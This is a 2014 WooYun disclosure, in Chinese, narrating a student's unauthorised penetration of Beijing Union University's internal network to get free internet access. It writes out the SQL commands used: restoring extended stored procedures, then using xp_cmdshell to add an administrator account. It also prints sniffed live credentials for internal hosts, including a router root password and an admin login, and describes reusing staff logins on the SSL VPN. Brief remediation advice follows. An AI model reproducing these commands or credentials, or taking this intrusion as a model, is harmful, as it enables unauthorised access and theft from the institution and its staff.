当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077615

漏洞标题:北京联合大学内网渗透小记

相关厂商:北京联合大学

漏洞作者: CkDebug

提交时间:2014-09-28 12:38

修复时间:2014-11-12 12:42

公开时间:2014-11-12 12:42

漏洞类型:服务弱口令

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-28: 细节已通知厂商并且等待厂商处理中
2014-09-29: 厂商已经确认,细节仅向厂商公开
2014-10-09: 细节向核心白帽子及相关领域专家公开
2014-10-19: 细节向普通白帽子公开
2014-10-29: 细节向实习白帽子公开
2014-11-12: 细节向公众公开

简要描述:

故事前景:
目前来到北京联合大学学习逆向工程,教室的局域网实在太卡,所以打起了校园无线网BUU的主意.但没有学号登录,只能另避蹊径想办法绕过验证.下面开始展开小逸的内网渗透之旅,没啥技术含量,大牛请飘过...

详细说明:

故事前景:
目前来到北京联合大学学习逆向工程,教室的局域网实在太卡,所以打起了校园无线网BUU的主意.但没有学号登录,只能另避蹊径想办法绕过验证.下面开始展开小逸的内网渗透之旅,没啥技术含量,大牛请飘过...

image001.png


image003.png


校园内网渗透有几个思路,WEB渗透,MSQSQL弱口令提权,MYSQL弱口令提权,3389爆破...等.小逸就先从数据库弱口令开始吧.请出短小精悍的S扫描器,扫局域网网段内的1433端口,

image008.jpg


扫出IP后整理成文本用scan(图片中我重命名了scan)挂字典批量扫MSSQL弱口令.

image007.png


开始穷举字典中的密码,匹配的保存为M.txt文本

image009.png


弱口令出来了,用SQL查询分析器(修正版)连接数据库,利用常用存储扩展提权,提权的代码度娘上泛滥.我会上传在附件中.
先查看是否开启终端(不开启用命令开启),终端端口为多少
查看3389端口
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'

image011.png


恢复时一些常用的SQL语句:
利用sp_addextendedproc恢复大部分常用存储扩展(得先利用最顶上的语句恢复自己):
use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'

image014.jpg


xp_cmdshell添加用户:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec master.dbo.xp_cmdshell 'net user CkDebug 123456 /add'
exec master.dbo.xp_cmdshell 'net localgroup administrators CkDebug /add'

image015.png


成功建立帐号 CkDebug \123456

image017.png


表中不少敏感信息,怕被查水表我就不贴全图了.(仅供测试,过后我会把帐号删除)

image019.png


价值不大,不过目的已经达到,最终小逸建立了VPN达到了绕过验证上网的目的.
基本上扫出的弱口令都能提权,下面贴下几个图

image021.png


(16核心8G服务器)

image023.png


(计费管理系统)
思路和手法都一样,我就不重复了.目的也已经达到,架设了VPN免费上网..但美中不足的是被限速了,服务器里下载速度可以达到100M独享,本地链接服务器VPN只是100KB左右(听说上一期师兄也用服务器代理,下载速度也是60M每秒.前段时间被管理员发现了所以限速了)我猜想是连接到BUU无线这被限制了速度,接入内网的时候限速了.想到两个解决思路.第一接WAN(教室内有网线,教室附近有机箱.弄个迷你路由接有限然后ap热点.).第二继续渗透路由,修改限速.(毕竟第一个比较危险,被发现的时候一抓一个准).
在服务器中嗅探抓包.

image025.png

image027.png


card.buu.edu.cn/homeLogin.action是校园卡查询系统,嗅探到帐号(学号和密码),最后经过测试,校园卡一卡通的帐号能查询饭卡,登录BUU验证等,作用很大....(工号位数比较短的是教师的工号,最后发现,这工号作用很大)

image030.jpg


嗅探出
http://192.168.192.14/web 路由
root bshdl-97h

image031.png


image033.png


嗅探出http://1.202.89.6/muc/login.action
admin MUNCAdministrator

image036.jpg


嗅探出的敏感密码太多 我就不一一列举了,下面小逸就讲讲利用嗅探到的密码继续渗透

image038.jpg


利用得到的工号和密码登录上了BUU.又一个办法免费上网了....

image040.jpg


在外网可以利用教师的工号登录SSL VPN

image042.jpg


image043.png


image045.png


image047.png


image049.png


image051.png


image053.png


image055.png

漏洞证明:

MYSQL弱口令也测试过,利用查询命令也可以root.
还有不少敏感的网址和密码我就不一一截图了,既然目的已经达到了,就风扯吧,此次渗透只是测试,已经把日志和所建的帐号删除,请大大勿跨省.

修复方案:

第一 修改MSSQL或者MYSQL默认端口,修改密码复杂
第二 服务器绑定网关,或者装arp防火墙禁止嗅探
第三 教师密码初始化后第一次登录要求改密码
第四 敏感地址如路由等绑定mac访问
第五 不用请我吃饭了,也别来找我麻烦吧.我是一个学生,也是一个雷锋

版权声明:转载请注明来源 CkDebug@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-09-29 16:03

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2014-09-28 13:23 | hughlvan ( 实习白帽子 | Rank:82 漏洞数:11 | 前半生拿命换钱,后半生拿钱换命,这就是理...)

    前排观看,求带

  2. 2014-09-28 13:49 | 林枫 ( 实习白帽子 | Rank:44 漏洞数:6 | ....)

    应该是利用struts2

  3. 2014-09-28 14:14 | hughlvan ( 实习白帽子 | Rank:82 漏洞数:11 | 前半生拿命换钱,后半生拿钱换命,这就是理...)

    @林枫 不是st2

  4. 2014-09-28 14:25 | CkDebug ( 路人 | Rank:15 漏洞数:2 | 追逐梦想,关注互联网安全)

    @林枫 不是struts2,弱口令+社工而已,没什么技术含量,不要见笑

  5. 2014-09-28 17:35 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    @CkDebug 想当年哥去北京联合大学玩,碰到一个妹子,早认识你找你去社工了……

  6. 2014-09-28 23:19 | CkDebug ( 路人 | Rank:15 漏洞数:2 | 追逐梦想,关注互联网安全)

    @hkAssassin 现在认识也不晚啊,兄弟,交个朋友,以后多多交流.带我装逼带我飞吧

  7. 2014-09-29 00:12 | hughlvan ( 实习白帽子 | Rank:82 漏洞数:11 | 前半生拿命换钱,后半生拿钱换命,这就是理...)

    @CkDebug 加上我好不啦

  8. 2014-09-29 10:21 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    @CkDebug 私信你的企鹅号,我加你哈……求妹子信息哈哈

  9. 2014-11-12 12:53 | PanFake ( 路人 | Rank:6 漏洞数:5 | 略懂略懂)

    说实话现在手里有估计Rank20级别的漏洞,但是想了想,还是毕业再提交吧。。。

  10. 2014-11-13 14:44 | 南柯太守 ( 路人 | Rank:2 漏洞数:1 | 专注web开发的安全入门者)

    @CkDebug求带

  11. 2014-11-18 21:15 | h1ck5r ( 路人 | Rank:5 漏洞数:5 )

    联大欢迎你。。。